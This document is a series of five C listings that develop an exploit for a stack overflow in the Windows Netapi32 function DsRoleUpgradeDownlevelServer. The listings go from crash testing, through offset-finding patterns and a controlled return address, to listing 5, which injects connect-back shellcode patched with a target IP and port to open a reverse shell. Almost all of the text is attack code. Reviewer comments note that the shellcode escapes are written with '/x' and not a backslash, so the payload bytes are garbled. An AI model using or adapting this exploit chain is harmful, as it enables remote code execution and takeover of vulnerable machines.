1.
#include
#include
#pragma comment(lib, "netapi32.lib")
#pragma comment(lib, "ws2_32.lib")
/* Guessed prototype for the Netapi32 export that the listings exercise:
 * twelve DWORD-sized arguments, stdcall. Pointers are passed through
 * unsigned long, so this only holds for a 32-bit build. */
typedef int (_stdcall *DSROLEUPGRADEDOWNLEVELSERVER)(
    unsigned long a1,  unsigned long a2,  unsigned long a3,  unsigned long a4,
    unsigned long a5,  unsigned long a6,  unsigned long a7,  unsigned long a8,
    unsigned long a9,  unsigned long a10, unsigned long a11, unsigned long a12);

/* Resolved by main() with GetProcAddress; NULL until then. */
DSROLEUPGRADEDOWNLEVELSERVER DsRoleUpgradeDownlevelServer;

/* Number of wide characters placed in the oversized first argument. */
#define MAXLEN 5000

/* buf:  the first argument, laid out as UTF-16LE (two bytes per char).
 * buf2: 2000 zero bytes whose address is handed to the other 11 parameters. */
char buf[MAXLEN * 2];
char buf2[2000];
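/*
 * Listing 1: hand DsRoleUpgradeDownlevelServer an oversized first argument
 * and see whether the call survives it.
 *
 * buf is laid out as UTF-16LE ("xx 00 xx 00 ..."): each 'A' is followed by
 * a 0x00 byte, so the callee sees a MAXLEN-character wide string. The other
 * 11 parameters all receive the address of buf2 (2000 zero bytes). Where the
 * callee copies that string, and whether the copy overflows, is not visible
 * from this side of the call — watch for the crash in a debugger.
 *
 * The export is looked up at run time because it is not in the public
 * headers. The guessed prototype passes pointers as unsigned long, which is
 * only valid for a 32-bit build; that is checked before anything else.
 *
 * Returns 0 if the call returns, 1 if the PoC could not be set up.
 */
int main(int argc, char **argv)
{
    HMODULE hNetapi;
    unsigned long arg0, other;
    int i, rc;

    (void)argc;
    (void)argv;

    /* On x64 Windows unsigned long is 32 bits, so the pointer casts below
     * would silently truncate addresses; refuse to run there. */
    if (sizeof(void *) != sizeof(unsigned long)) {
        printf("This PoC passes pointers as unsigned long; build it as 32-bit.\n");
        return 1;
    }

    /* Netapi32.dll is normally resolved from System32; pass a full path if
     * you need to rule out DLL search-order games from a hostile directory. */
    hNetapi = LoadLibrary("Netapi32.dll");
    if (!hNetapi) {
        printf("Can't load Netapi32.dll...\n");
        return 1;
    }

    DsRoleUpgradeDownlevelServer = (DSROLEUPGRADEDOWNLEVELSERVER)
        GetProcAddress(hNetapi, "DsRoleUpgradeDownlevelServer");
    if (!DsRoleUpgradeDownlevelServer) {
        printf("Can't get function DsRoleUpgradeDownlevelServer...\n");
        FreeLibrary(hNetapi);
        return 1;
    }

    /* MAXLEN wide chars of 'A': low byte 'A', high byte left 0 by memset.
     * 2*i stays below sizeof buf for every i < MAXLEN. */
    memset(buf, 0, sizeof buf);
    for (i = 0; i < MAXLEN; i++)
        buf[2 * i] = 'A';

    arg0 = (unsigned long)&buf[0];
    other = (unsigned long)&buf2[0];

    /* Flush before the call: if the process dies inside it, buffered stdout
     * would otherwise never appear. */
    printf("Calling DsRoleUpgradeDownlevelServer with %d wide chars...\n", MAXLEN);
    fflush(stdout);

    rc = DsRoleUpgradeDownlevelServer(arg0, other, other, other, other, other,
                                      other, other, other, other, other, other);
    printf("Call returned %d.\n", rc);

    FreeLibrary(hNetapi);
    return 0;
}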
2.
#include
#include
#pragma comment(lib, "netapi32.lib")
#pragma comment(lib, "ws2_32.lib")
/* Guessed prototype for the Netapi32 export that the listings exercise:
 * twelve DWORD-sized arguments, stdcall. Pointers are passed through
 * unsigned long, so this only holds for a 32-bit build. */
typedef int (_stdcall *DSROLEUPGRADEDOWNLEVELSERVER)(
    unsigned long a1,  unsigned long a2,  unsigned long a3,  unsigned long a4,
    unsigned long a5,  unsigned long a6,  unsigned long a7,  unsigned long a8,
    unsigned long a9,  unsigned long a10, unsigned long a11, unsigned long a12);

/* Resolved by main() with GetProcAddress; NULL until then. */
DSROLEUPGRADEDOWNLEVELSERVER DsRoleUpgradeDownlevelServer;

/* Number of wide characters placed in the oversized first argument. */
#define MAXLEN 5000

/* buf:  the first argument, laid out as UTF-16LE (two bytes per char).
 * buf2: 2000 zero bytes whose address is handed to the other 11 parameters. */
char buf[MAXLEN * 2];
char buf2[2000];
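/*
 * Listing 2: the same call as listing 1, but the wide string carries a
 * position-marking pattern instead of 'A's: low byte 100 + (i % 100), i.e.
 * values 100..199 repeating every 100 wide characters. Presumably the byte
 * seen in a clobbered register or return address is then read back to an
 * index modulo 100 in the debugger; listing 3 supplies the other half.
 *
 * Layout and caveats are as in listing 1: UTF-16LE buffer (high bytes 0),
 * buf2 for the remaining 11 parameters, 32-bit build only.
 *
 * Returns 0 if the call returns, 1 if the PoC could not be set up.
 */
int main(int argc, char **argv)
{
    HMODULE hNetapi;
    unsigned long arg0, other;
    int i, rc;

    (void)argc;
    (void)argv;

    /* On x64 Windows unsigned long is 32 bits, so the pointer casts below
     * would silently truncate addresses; refuse to run there. */
    if (sizeof(void *) != sizeof(unsigned long)) {
        printf("This PoC passes pointers as unsigned long; build it as 32-bit.\n");
        return 1;
    }

    /* Netapi32.dll is normally resolved from System32; pass a full path if
     * you need to rule out DLL search-order games from a hostile directory. */
    hNetapi = LoadLibrary("Netapi32.dll");
    if (!hNetapi) {
        printf("Can't load Netapi32.dll...\n");
        return 1;
    }

    DsRoleUpgradeDownlevelServer = (DSROLEUPGRADEDOWNLEVELSERVER)
        GetProcAddress(hNetapi, "DsRoleUpgradeDownlevelServer");
    if (!DsRoleUpgradeDownlevelServer) {
        printf("Can't get function DsRoleUpgradeDownlevelServer...\n");
        FreeLibrary(hNetapi);
        return 1;
    }

    /* Pattern in the low byte of each wide char; high byte left 0 by
     * memset. 2*i stays below sizeof buf for every i < MAXLEN. Values
     * 128..199 are not ASCII: if the callee narrows the string through a
     * code page they may not survive byte-for-byte — confirm in the
     * debugger before trusting the read-back. */
    memset(buf, 0, sizeof buf);
    for (i = 0; i < MAXLEN; i++)
        buf[2 * i] = (char)(i % 100 + 100);

    arg0 = (unsigned long)&buf[0];
    other = (unsigned long)&buf2[0];

    /* Flush before the call: if the process dies inside it, buffered stdout
     * would otherwise never appear. */
    printf("Calling DsRoleUpgradeDownlevelServer with %d wide chars...\n", MAXLEN);
    fflush(stdout);

    rc = DsRoleUpgradeDownlevelServer(arg0, other, other, other, other, other,
                                      other, other, other, other, other, other);
    printf("Call returned %d.\n", rc);

    FreeLibrary(hNetapi);
    return 0;
}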
3.
#include
#include
#pragma comment(lib, "netapi32.lib")
#pragma comment(lib, "ws2_32.lib")
/* Guessed prototype for the Netapi32 export that the listings exercise:
 * twelve DWORD-sized arguments, stdcall. Pointers are passed through
 * unsigned long, so this only holds for a 32-bit build. */
typedef int (_stdcall *DSROLEUPGRADEDOWNLEVELSERVER)(
    unsigned long a1,  unsigned long a2,  unsigned long a3,  unsigned long a4,
    unsigned long a5,  unsigned long a6,  unsigned long a7,  unsigned long a8,
    unsigned long a9,  unsigned long a10, unsigned long a11, unsigned long a12);

/* Resolved by main() with GetProcAddress; NULL until then. */
DSROLEUPGRADEDOWNLEVELSERVER DsRoleUpgradeDownlevelServer;

/* Number of wide characters placed in the oversized first argument. */
#define MAXLEN 5000

/* buf:  the first argument, laid out as UTF-16LE (two bytes per char).
 * buf2: 2000 zero bytes whose address is handed to the other 11 parameters. */
char buf[MAXLEN * 2];
char buf2[2000];
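/*
 * Listing 3: the same call with the complementary position pattern: low
 * byte 100 + (i / 100), i.e. values 100..149, constant over each run of 100
 * wide characters. Together with listing 2 (index modulo 100) this
 * presumably pins the exact wide index that reaches the clobbered location.
 *
 * Layout and caveats are as in listing 1: UTF-16LE buffer (high bytes 0),
 * buf2 for the remaining 11 parameters, 32-bit build only.
 *
 * Returns 0 if the call returns, 1 if the PoC could not be set up.
 */
int main(int argc, char **argv)
{
    HMODULE hNetapi;
    unsigned long arg0, other;
    int i, rc;

    (void)argc;
    (void)argv;

    /* On x64 Windows unsigned long is 32 bits, so the pointer casts below
     * would silently truncate addresses; refuse to run there. */
    if (sizeof(void *) != sizeof(unsigned long)) {
        printf("This PoC passes pointers as unsigned long; build it as 32-bit.\n");
        return 1;
    }

    /* Netapi32.dll is normally resolved from System32; pass a full path if
     * you need to rule out DLL search-order games from a hostile directory. */
    hNetapi = LoadLibrary("Netapi32.dll");
    if (!hNetapi) {
        printf("Can't load Netapi32.dll...\n");
        return 1;
    }

    DsRoleUpgradeDownlevelServer = (DSROLEUPGRADEDOWNLEVELSERVER)
        GetProcAddress(hNetapi, "DsRoleUpgradeDownlevelServer");
    if (!DsRoleUpgradeDownlevelServer) {
        printf("Can't get function DsRoleUpgradeDownlevelServer...\n");
        FreeLibrary(hNetapi);
        return 1;
    }

    /* Pattern in the low byte of each wide char; high byte left 0 by
     * memset. 2*i stays below sizeof buf for every i < MAXLEN. From i=2800
     * on the value is >= 128, i.e. not ASCII: if the callee narrows the
     * string through a code page those bytes may not survive byte-for-byte —
     * confirm in the debugger before trusting the read-back. */
    memset(buf, 0, sizeof buf);
    for (i = 0; i < MAXLEN; i++)
        buf[2 * i] = (char)(i / 100 + 100);

    arg0 = (unsigned long)&buf[0];
    other = (unsigned long)&buf2[0];

    /* Flush before the call: if the process dies inside it, buffered stdout
     * would otherwise never appear. */
    printf("Calling DsRoleUpgradeDownlevelServer with %d wide chars...\n", MAXLEN);
    fflush(stdout);

    rc = DsRoleUpgradeDownlevelServer(arg0, other, other, other, other, other,
                                      other, other, other, other, other, other);
    printf("Call returned %d.\n", rc);

    FreeLibrary(hNetapi);
    return 0;
}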
4.
#include
#include
#pragma comment(lib, "netapi32.lib")
#pragma comment(lib, "ws2_32.lib")
/* Guessed prototype for the Netapi32 export that the listings exercise:
 * twelve DWORD-sized arguments, stdcall. Pointers are passed through
 * unsigned long, so this only holds for a 32-bit build. */
typedef int (_stdcall *DSROLEUPGRADEDOWNLEVELSERVER)(
    unsigned long a1,  unsigned long a2,  unsigned long a3,  unsigned long a4,
    unsigned long a5,  unsigned long a6,  unsigned long a7,  unsigned long a8,
    unsigned long a9,  unsigned long a10, unsigned long a11, unsigned long a12);

/* Resolved by main() with GetProcAddress; NULL until then. */
DSROLEUPGRADEDOWNLEVELSERVER DsRoleUpgradeDownlevelServer;

/* Number of wide characters placed in the oversized first argument. */
#define MAXLEN 5000

/* buf:  the first argument, laid out as UTF-16LE (two bytes per char).
 * buf2: 2000 zero bytes whose address is handed to the other 11 parameters. */
char buf[MAXLEN * 2];
char buf2[2000];
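/* Store v little-endian in the low bytes of four consecutive wide chars of
 * wide, starting at wide index idx. The high bytes are left untouched (0x00
 * here). Writes wide[2*idx] .. wide[2*(idx+3)]; the caller keeps idx+3 < MAXLEN. */
static void put_dword_le(char *wide, size_t idx, unsigned long v)
{
    size_t k;
    for (k = 0; k < 4; k++)
        wide[2 * (idx + k)] = (char)((v >> (8 * k)) & 0xFF);
}

/*
 * Listing 4: the listing-3 pattern plus one controlled dword. The bytes
 * 71 15 FA 7F — 0x7FFA1571 little-endian — are placed at wide indices
 * 2844..2847, the position presumably located with the patterns of
 * listings 2 and 3. What 0x7FFA1571 points at is not stated in the listing;
 * verify in the debugger that control actually arrives there before
 * building on it (listing 5 does).
 *
 * Layout and caveats are as in listing 1: UTF-16LE buffer (high bytes 0),
 * buf2 for the remaining 11 parameters, 32-bit build only. A 0x00 low byte
 * anywhere would pair with the 0x00 high byte into a wide NUL; none of the
 * four address bytes is zero.
 *
 * Returns 0 if the call returns, 1 if the PoC could not be set up.
 */
int main(int argc, char **argv)
{
    enum { RET_INDEX = 2844 };
    const unsigned long ret_value = 0x7FFA1571UL;
    HMODULE hNetapi;
    unsigned long arg0, other;
    int i, rc;

    (void)argc;
    (void)argv;

    /* On x64 Windows unsigned long is 32 bits, so the pointer casts below
     * would silently truncate addresses; refuse to run there. */
    if (sizeof(void *) != sizeof(unsigned long)) {
        printf("This PoC passes pointers as unsigned long; build it as 32-bit.\n");
        return 1;
    }

    /* Netapi32.dll is normally resolved from System32; pass a full path if
     * you need to rule out DLL search-order games from a hostile directory. */
    hNetapi = LoadLibrary("Netapi32.dll");
    if (!hNetapi) {
        printf("Can't load Netapi32.dll...\n");
        return 1;
    }

    DsRoleUpgradeDownlevelServer = (DSROLEUPGRADEDOWNLEVELSERVER)
        GetProcAddress(hNetapi, "DsRoleUpgradeDownlevelServer");
    if (!DsRoleUpgradeDownlevelServer) {
        printf("Can't get function DsRoleUpgradeDownlevelServer...\n");
        FreeLibrary(hNetapi);
        return 1;
    }

    /* Listing-3 pattern (100 + i/100) in the low byte of each wide char;
     * high byte left 0 by memset. 2*i stays below sizeof buf for i < MAXLEN. */
    memset(buf, 0, sizeof buf);
    for (i = 0; i < MAXLEN; i++)
        buf[2 * i] = (char)(i / 100 + 100);

    /* Overwrite wide indices 2844..2847 with the chosen dword. */
    put_dword_le(buf, RET_INDEX, ret_value);

    arg0 = (unsigned long)&buf[0];
    other = (unsigned long)&buf2[0];

    /* Flush before the call: if the process dies inside it, buffered stdout
     * would otherwise never appear. */
    printf("Calling DsRoleUpgradeDownlevelServer with 0x%08lX at wide index %d...\n",
           ret_value, (int)RET_INDEX);
    fflush(stdout);

    rc = DsRoleUpgradeDownlevelServer(arg0, other, other, other, other, other,
                                      other, other, other, other, other, other);
    printf("Call returned %d.\n", rc);

    FreeLibrary(hNetapi);
    return 0;
}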
5.
#include
#include
#pragma comment(lib, "netapi32.lib")
#pragma comment(lib, "ws2_32.lib")
/* Guessed prototype for the Netapi32 export that the listings exercise:
 * twelve DWORD-sized arguments, stdcall. Pointers are passed through
 * unsigned long, so this only holds for a 32-bit build. */
typedef int (_stdcall *DSROLEUPGRADEDOWNLEVELSERVER)(
    unsigned long a1,  unsigned long a2,  unsigned long a3,  unsigned long a4,
    unsigned long a5,  unsigned long a6,  unsigned long a7,  unsigned long a8,
    unsigned long a9,  unsigned long a10, unsigned long a11, unsigned long a12);

/* Resolved by main() with GetProcAddress; NULL until then. */
DSROLEUPGRADEDOWNLEVELSERVER DsRoleUpgradeDownlevelServer;

/* Number of wide characters placed in the oversized first argument. */
#define MAXLEN 5000

/* buf:  the first argument, laid out as UTF-16LE (two bytes per char).
 * buf2: 2000 zero bytes whose address is handed to the other 11 parameters. */
char buf[MAXLEN * 2];
char buf2[2000];
/* Byte offsets inside Shellcode that MShell() overwrites with the
 * connect-back port (2 bytes at PORT_OFFSET) and IPv4 address (4 bytes at
 * IP_OFFSET). Both values are XOR-masked with 0x99 bytes before the write. */
#define PORT_OFFSET 118
#define IP_OFFSET 111
/* Connect-back payload. main() copies it byte-by-byte into the low bytes of
 * the wide-char buffer starting at wide index 2848, after MShell() has
 * patched the target in. The 0x99 masking done by MShell() presumably
 * matches a decoder at the front of this blob — not verified here.
 *
 * NOTE(review): every escape below is written as "/xEB" and so on. To a C
 * compiler that is four ordinary characters ('/', 'x', 'E', 'B'), not the
 * single byte 0xEB; with the text as shown the array is roughly four times
 * the intended size and contains no machine code, and PORT_OFFSET/IP_OFFSET
 * land on unrelated characters. The published listing most likely used
 * "\xEB"-style escapes; treat this copy as garbled. */
char Shellcode[] = "/xEB/x10/x5B/x4B/x33/xC9/x66/xB9/x25/x01/x80/x34/x0B/x99/xE2/xFA"
"/xEB/x05/xE8/xEB/xFF/xFF/xFF"
"/x70/x62/x99/x99/x99/xC6/xFD/x38/xA9/x99/x99/x99/x12/xD9/x95/x12"
"/xE9/x85/x34/x12/xF1/x91/x12/x6E/xF3/x9D/xC0/x71/x02/x99/x99/x99"
"/x7B/x60/xF1/xAA/xAB/x99/x99/xF1/xEE/xEA/xAB/xC6/xCD/x66/x8F/x12"
"/x71/xF3/x9D/xC0/x71/x1B/x99/x99/x99/x7B/x60/x18/x75/x09/x98/x99"
"/x99/xCD/xF1/x98/x98/x99/x99/x66/xCF/x89/xC9/xC9/xC9/xC9/xD9/xC9"
"/xD9/xC9/x66/xCF/x8D/x12/x41/xF1/xE6/x99/x99/x98/xF1/x9B/x99/x99"
"/xAC/x12/x55/xF3/x89/xC8/xCA/x66/xCF/x81/x1C/x59/xEC/xD3/xF1/xFA"
"/xF4/xFD/x99/x10/xFF/xA9/x1A/x75/xCD/x14/xA5/xBD/xF3/x8C/xC0/x32"
"/x7B/x64/x5F/xDD/xBD/x89/xDD/x67/xDD/xBD/xA4/x10/xC5/xBD/xD1/x10"
"/xC5/xBD/xD5/x10/xC5/xBD/xC9/x14/xDD/xBD/x89/xCD/xC9/xC8/xC8/xC8"
"/xF3/x98/xC8/xC8/x66/xEF/xA9/xC8/x66/xCF/x9D/x12/x55/xF3/x66/x66"
"/xA8/x66/xCF/x91/xCA/x66/xCF/x85/x66/xCF/x95/xC8/xCF/x12/xDC/xA5"
"/x12/xCD/xB1/xE1/x9A/x4C/xCB/x12/xEB/xB9/x9A/x6C/xAA/x50/xD0/xD8"
"/x34/x9A/x5C/xAA/x42/x96/x27/x89/xA3/x4F/xED/x91/x58/x52/x94/x9A"
"/x43/xD9/x72/x68/xA2/x86/xEC/x7E/xC3/x12/xC3/xBD/x9A/x44/xFF/x12"
"/x95/xD2/x12/xC3/x85/x9A/x44/x12/x9D/x12/x9A/x5C/x32/xC7/xC0/x5A"
"/x71/x99/x66/x66/x66/x17/xD7/x97/x75/xEB/x67/x2A/x8F/x34/x40/x9C"
"/x57/xE7/x41/x7B/xEA/x52/x74/x65/xA2/x40/x90/x6C/x34/x75/x60/x33"
"/xF9/x7E/xE0/x5F/xE0";
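/*
 * Patch the connect-back target into Shellcode in place.
 *
 * h: dotted-quad IPv4 address as a string (e.g. "127.0.0.1").
 * p: decimal TCP port as a string, 1..65535.
 *
 * The port is converted to network byte order and XOR-masked with 0x9999,
 * the address XOR-masked with 0x99999999, and the results written at
 * PORT_OFFSET (2 bytes) and IP_OFFSET (4 bytes). The masking presumably
 * matches a decoder at the front of Shellcode; that is not verified here.
 *
 * Returns 0 on success and -1 with Shellcode untouched when the address does
 * not parse, the port is not a clean number in 1..65535, or either patch
 * slot would fall outside Shellcode. The original version had no checks and
 * returned void; callers that ignore the result see the same behavior for
 * valid input.
 */
int MShell(char *h, char *p)
{
    unsigned short port;
    unsigned long ip;
    long portval;
    char *end;

    if (h == NULL || p == NULL)
        return -1;

    /* strtol rather than atoi so that garbage and out-of-range ports are
     * rejected instead of silently becoming 0 or a truncated value. */
    portval = strtol(p, &end, 10);
    if (end == p || *end != '\0' || portval < 1 || portval > 65535)
        return -1;

    /* inet_addr reports failure as INADDR_NONE, which is also the encoding
     * of 255.255.255.255; that address is therefore rejected too. */
    ip = inet_addr(h);
    if (ip == INADDR_NONE)
        return -1;

    /* Never write past the end of the global payload, whatever its size. */
    if (PORT_OFFSET + 2 > sizeof Shellcode || IP_OFFSET + 4 > sizeof Shellcode)
        return -1;

    port = htons((unsigned short)portval) ^ (USHORT)0x9999;
    ip ^= (ULONG)0x99999999;
    memcpy(&Shellcode[PORT_OFFSET], &port, 2);
    memcpy(&Shellcode[IP_OFFSET], &ip, 4);
    return 0;
}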
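/* Store v little-endian in the low bytes of four consecutive wide chars of
 * wide, starting at wide index idx. The high bytes are left untouched (0x00
 * here). Writes wide[2*idx] .. wide[2*(idx+3)]; the caller keeps idx+3 < MAXLEN. */
static void put_dword_le(char *wide, size_t idx, unsigned long v)
{
    size_t k;
    for (k = 0; k < 4; k++)
        wide[2 * (idx + k)] = (char)((v >> (8 * k)) & 0xFF);
}

/*
 * Listing 5: listing 4 plus a payload. In the low bytes of the wide buffer:
 *
 *   wide index 2840..2843  90 90 EB 04   nop; nop; jmp +4 (over the dword)
 *   wide index 2844..2847  71 15 FA 7F   0x7FFA1571, as in listing 4
 *   wide index 2848..      Shellcode     connect-back to 127.0.0.1:1111
 *
 * If execution lands on index 2840 the jmp hops the address dword and runs
 * the payload at 2848. That only forms contiguous machine code if the
 * callee drops the 0x00 high bytes (e.g. narrows the wide string) before
 * the overflowing copy — presumed from the "xx 00 xx 00" layout, not
 * verified here. For the same reason any 0x00 low byte would pair with its
 * high byte into a wide NUL; none of the fixed bytes above is zero, and
 * MShell's 0x99 masking looks meant to keep the ip/port bytes non-zero.
 *
 * The connect-back target is hard-coded to localhost:1111 — start a listener
 * there before running. Layout and caveats otherwise as in listing 1: buf2
 * for the remaining 11 parameters, 32-bit build only.
 *
 * Returns 0 if the call returns, 1 if the PoC could not be set up.
 */
int main(int argc, char **argv)
{
    enum { HOP_INDEX = 2840, RET_INDEX = 2844, SHELL_INDEX = 2848 };
    static const unsigned char hop[4] = { 0x90, 0x90, 0xEB, 0x04 };
    const unsigned long ret_value = 0x7FFA1571UL;
    HMODULE hNetapi;
    unsigned long arg0, other;
    size_t k;
    int i, rc;

    (void)argc;
    (void)argv;

    /* On x64 Windows unsigned long is 32 bits, so the pointer casts below
     * would silently truncate addresses; refuse to run there. */
    if (sizeof(void *) != sizeof(unsigned long)) {
        printf("This PoC passes pointers as unsigned long; build it as 32-bit.\n");
        return 1;
    }

    /* The payload copy below must stay inside buf (MAXLEN wide chars); the
     * original had no check and would overrun its own buffer with a larger
     * Shellcode. */
    if (SHELL_INDEX + sizeof Shellcode > MAXLEN) {
        printf("Shellcode (%u bytes) does not fit below MAXLEN at wide index %d.\n",
               (unsigned)sizeof Shellcode, (int)SHELL_INDEX);
        return 1;
    }

    /* Netapi32.dll is normally resolved from System32; pass a full path if
     * you need to rule out DLL search-order games from a hostile directory. */
    hNetapi = LoadLibrary("Netapi32.dll");
    if (!hNetapi) {
        printf("Can't load Netapi32.dll...\n");
        return 1;
    }

    DsRoleUpgradeDownlevelServer = (DSROLEUPGRADEDOWNLEVELSERVER)
        GetProcAddress(hNetapi, "DsRoleUpgradeDownlevelServer");
    if (!DsRoleUpgradeDownlevelServer) {
        printf("Can't get function DsRoleUpgradeDownlevelServer...\n");
        FreeLibrary(hNetapi);
        return 1;
    }

    /* Listing-3 pattern (100 + i/100) in the low byte of each wide char;
     * high byte left 0 by memset. 2*i stays below sizeof buf for i < MAXLEN. */
    memset(buf, 0, sizeof buf);
    for (i = 0; i < MAXLEN; i++)
        buf[2 * i] = (char)(i / 100 + 100);

    /* nop; nop; jmp +4 at 2840..2843, then the address dword at 2844..2847. */
    for (k = 0; k < sizeof hop; k++)
        buf[2 * (HOP_INDEX + k)] = (char)hop[k];
    put_dword_le(buf, RET_INDEX, ret_value);

    /* Patch the connect-back target, then lay the payload out from 2848
     * (the terminating NUL of Shellcode is copied too, as before). */
    MShell("127.0.0.1", "1111");
    for (k = 0; k < sizeof Shellcode; k++)
        buf[2 * (SHELL_INDEX + k)] = Shellcode[k];

    arg0 = (unsigned long)&buf[0];
    other = (unsigned long)&buf2[0];

    /* Flush before the call: if the process dies inside it, buffered stdout
     * would otherwise never appear. */
    printf("Calling DsRoleUpgradeDownlevelServer (payload at wide index %d, "
           "connect-back 127.0.0.1:1111)...\n", (int)SHELL_INDEX);
    fflush(stdout);

    rc = DsRoleUpgradeDownlevelServer(arg0, other, other, other, other, other,
                                      other, other, other, other, other, other);
    printf("Call returned %d.\n", rc);

    FreeLibrary(hNetapi);
    return 0;
}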